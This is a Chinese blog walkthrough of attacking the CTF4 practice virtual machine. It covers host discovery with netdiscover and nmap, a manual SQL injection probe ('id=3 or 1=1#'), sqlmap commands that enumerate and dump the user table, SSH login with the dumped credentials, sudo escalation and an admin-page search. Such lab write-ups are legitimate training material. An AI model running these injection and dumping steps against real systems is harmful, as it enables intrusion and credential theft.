CTF4靶机渗透

最新推荐文章于 2024-05-09 16:43:58 发布
最新推荐文章于 2024-05-09 16:43:58 发布
阅读量1.5k 收藏 9
点赞数
分类专栏: web渗透 文章标签: mysql 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43351292/article/details/113177725
版权

环境搭建

攻击机:kali
靶机:CTF4
CTF4靶机靶机下载 点击直接下载.
Tips:首次打开虚拟机时要选择“我已移动该虚拟机”选项。
此次训练其中一步为获取目标的账号密码,故目标环境无需登录。
两台机器环境kali和ctf4 都设置为NAT模式

实战演练

主机发现

kali的IP:192.168.99.132
在这里插入图片描述使用netdiscover命令寻找ctf4的IP:

netdiscover -r 192.168.99.0/24

扫描结果如下:
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210126125254589.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzMzUxMjky,size_16,color_FFFFFF,t_70

端口扫描

nmap 192.168.99.141 -v -sV

默认扫描1-1000端口
-v显示扫描细节
-sV显示版本信息
在这里插入图片描述22、25、80、631端口开放
使用浏览器访问一下ctf4:
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210126125638129.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzMzUxMjky,size_16,color_FFFFFF,t_70

寻找突破点

查看了各个网页发现在Blog中存在SQL注入点

在这里插入图片描述点后链接改变出现id参数:
在这里插入图片描述加一个 ’
看看是否存在sql注入,发现网页返回报错,并且报了目录:
在这里插入图片描述改变id值=3时无法访问该页面:
在这里插入图片描述改变 id=3 or 1=1# 后可以访问
在这里插入图片描述由此找到一个sql注入点,利用sqlmap进行利用

sqlmap进行漏洞利用

sql注入漏洞探测
sqlmap -u "http://192.168.99.141/index.html?page=blog&title=Blog&id=3" -p id

在这里插入图片描述存在布尔注入和时间报错注入

爆库名
oot@kali:~# sqlmap -u "http://192.168.99.141/index.html?page=blog&title=Blog&id=3" -p id --dbs

在这里插入图片描述

爆表名
sqlmap -u "http://192.168.99.141/index.html?page=blog&title=Blog&id=3" -p id -D ehks --tables

在这里插入图片描述

脱库
sqlmap -u "http://192.168.99.141/index.html?page=blog&title=Blog&id=3" -p id -D ehks -T user --dump

在这里插入图片描述爆出了用户名和密码

使用ssh登录

使用dstevens用户登录
在这里插入图片描述尝试提权,居然成功了,太low了
在这里插入图片描述在这里插入图片描述

寻找后台

使用dirbuster寻找网站的一些二级目录:
在这里插入图片描述扫到amdin/login.php
在这里插入图片描述在浏览器中输入如下ulr,进入了后台登录界面,输入爆破的用户名和密码即可进入后台管理。
在这里插入图片描述在这里插入图片描述可以上传文字,可能存在xss等漏洞

其他的一些利用

发现可以包含文件,可进一步发掘文件包含漏洞
在这里插入图片描述结束

薛定谔之猫
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF4靶机训练
weixin_44132032的博客
08-19 3959
CTF4靶机训练环境下载主机发现端口扫描漏洞挖掘SSH利用权限提升 环境下载 链接:https://pan.baidu.com/s/1Kb4RKtnZ5RD43FAnjlYlsg 提取码:d59k Tips:首次打开虚拟机时要选择“我已移动该虚拟机”选项。 主机发现 使用命令: netdiscover 端口扫描 使用命令: namp -A -sS -sV -p- 目标主机IP 扫描得出目...
靶机精讲之CTF4
m0_63285023的博客
04-11 632
根据扫描服务提供的shh端口登录(22端口)发现index可进行手动爆破(地址包含)ssh不同版本的通讯不一样会导致报错。查看权限sudo -l pwd翻目录。80,25(明确版本)攻击面更大。复制密码user——pass。blog是交互式的程序。复制原网址(有注入网址)-dbs枚举操作系统。尝试sqlmap注入。或许会遇到这样的错误。
红队打靶:LampSecurity:CTF4打靶思路详解(vulnhub)
Bossfrank的博客
06-19 1545
本文对vulnhub中靶机LampSecurity:CTF4进行了打靶。核心步骤就是发现数据库查询参数->使用sqlmap进行注入->拿到用户名和密码->ssh登录,由于靶机较为老旧,现在我们可以使用许多自动化脚本工具进行渗透,但核心还是要了解渗透的思路和各种针对漏洞的脚本编写原理,而非单纯的使用工具。
网络安全最全CTF#4 Guessing Password 3&4(5),2024年最新醍醐灌顶
最新发布
2401_84252281的博客
05-09 323
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
零基础打靶—CTF4靶场
qq_61861243的博客
12-02 638
复制 license_info.json wa_data.dat 这两个文件到/home/acunetix/.acunetix/data/license/目录,全部替换即可。post 提交后,点击Blog,触发XSS,可以在BeEF页面,可以看到肉鸡上线,这里是本地宿主机这里使用的是本地火狐浏览器访问的,所以肉鸡为本地宿主机。尝试构建SQL注入语句,查看错误信息,order by判断字段发现6 页面报错,5页面没有报错,说明当前表有5列即5个字段。
VulnHub————CTF4
m0_63200360的博客
09-24 171
本人为新手,发文章只是记录学习笔记,大佬勿喷。文中很多地方有多种解法,并不唯一。
vulnhub-CTF4靶机实战
御七彩虹猫
04-26 3053
Vulnhub-CTF4靶机实战
CTF6靶机实战.zip
05-25
1. CTF靶机攻防基础:了解靶机的构成和渗透测试的基本流程。 2. 文件上传漏洞:学习如何发现和利用文件上传漏洞,以及如何构造反弹shell。 3. Linux脚本和系统漏洞利用:深入理解系统漏洞,编写和执行利用脚本。 4. ...
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
CTF渗透训练环境(镜像,视频,虚拟机)
12-26
靶机镜像,教学视频(SSH私钥泄露、SSH渗透root主机、SMB服务信息泄露、FTP服务后门利用、Sql-GET参数注入、Sql-POST参数...kali虚拟机(2022.4),虚拟机环境(Vmware、VirtualBox),下载环境来进行一次CTF渗透测试
网络渗透测试 CTF实践
12-02
实验目的:通过对目标靶机渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举...
【学渗透靶机——lampSecurityCTF4
jieli0901227的博客
05-13 293
page=blog&title=Blog&id=2 地址存在注入。发现sudo - l 发现该账号sudo 可执行root 所有命令,并且不需要密码。2、使用 order by 判断数据库的列。5、查询user 表的字段信息。4、查询当前数据库有哪些表。3、使用联合注入找报错点。nmap 主机漏洞探测。扫描出也没什么有用信息。1、通过浏览页面发现。
CTF4靶场复现步骤
weixin_66192597的博客
03-09 364
CTF4靶场攻略
CTF实践 靶机渗透
Radiency的博客
11-23 1464
CTF实践。通过对目标靶机渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围
VulnHub——Kioptrix Level 2
江左盟的博客
04-21 1177
简介 信息收集 使用fping -agq 192.168.0.0/24探测局域网内其它主机,发现目标主机IP地址,如图: 然后使用nmap --min-rate 10000 -T5 -A -sC -p1-65535 192.168.0.129快速扫描目标主机开启的端口与服务,发现开启22,80,111,443,631,660和3306端口, 使用SearchSploit搜...
渗透CTF4靶机
weixin_44901204的博客
08-21 862
环境: 渗透机:Kali 靶机CTF4 Kali与CTF4在同一网段 1.主机发现 nmap -v -Pn 10.10.10.0/24 使用扫描10网段,发现该网段存活的主机。 扫描结果如下: 发现CTF4开放了22,25,80端口。 22端口为ssh,远程登录协议 25端口为smtp,简单邮件传输协议 80端口为http服务。 2.页面测试 用火狐连接后,进行单引号测试(&id=2...
超菜鸟级ctf4
kid的博客
05-12 4803
超菜鸟级ctf4 前言 这次的题是真的很菜鸟级了,我这样的菜鸟都差不多做出了一半 题目 Burg Hohenzollern & Trakai Castle 这是两道sql注入题,基本一摸一样。特别是我用sqlmap来做就完全没有感受到两道题的区别 可以看到上图都是提示添加id参数,在URL后添加?id=1后会发现进入不同的页面,然后我是直接拿sqlmap跑的啊,十分顺利直接能爆库 ...
ctf5靶机 sql
07-28
抱歉,我无法回答关于CTF靶机的问题。 #### 引用[.reference_title] - *1* *3* [Vulnhub-CTF6靶机实战](https://blog.csdn.net/kengkeng123qwe/article/details/124817304)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Vulnhub-CTF5靶机实战](https://blog.csdn.net/kengkeng123qwe/article/details/124802020)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值